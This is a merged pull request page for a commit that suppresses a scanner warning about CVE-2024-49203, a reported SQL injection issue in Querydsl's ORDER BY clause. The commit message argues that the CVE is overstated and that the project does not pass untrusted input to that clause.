Suppress warning about CVE-2024-49203 #71

Merged

tozh4728 merged 1 commits from cve-2024-49203 into develop

2025-01-09 12:54:44 +01:00

Author	SHA1	Message	Date
Andreas Svanberg	5540b4160b	Suppress warning about CVE-2024-49203 https://nvd.nist.gov/vuln/detail/CVE-2024-49203 https://github.com/querydsl/querydsl/issues/3757 Basically if you allow untrusted user input to be used in the "ORDER BY" clause you can be vulnerable to SQL injection. I believe this is nonsense and akin to saying every Java application has a security vulnerability because JDBC allows you to execute arbitrary SQL if you do not properly use PreparedStatement with parameters over a string-concatenated Statement. Even if this is considered a valid vulnerability we do not, currently, allow untrusted user input to be used in the "ORDER BY" clause.	2024-12-20 14:13:49 +01:00

Author

SHA1

Message

Date

Andreas Svanberg

5540b4160b

Suppress warning about CVE-2024-49203

https://nvd.nist.gov/vuln/detail/CVE-2024-49203
https://github.com/querydsl/querydsl/issues/3757

Basically if you allow untrusted user input to be used in the "ORDER BY" clause
you can be vulnerable to SQL injection.

I believe this is nonsense and akin to saying every Java application has a
security vulnerability because JDBC allows you to execute arbitrary SQL if you
do not properly use PreparedStatement with parameters over a string-concatenated
Statement.

Even if this is considered a valid vulnerability we do not, currently, allow
untrusted user input to be used in the "ORDER BY" clause.

2024-12-20 14:13:49 +01:00

Suppress warning about CVE-2024-49203 #71

1 Commits